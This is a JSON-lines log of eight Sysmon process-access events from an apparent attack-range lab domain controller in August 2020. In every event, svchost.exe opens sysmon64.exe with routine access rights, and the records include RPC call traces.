{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
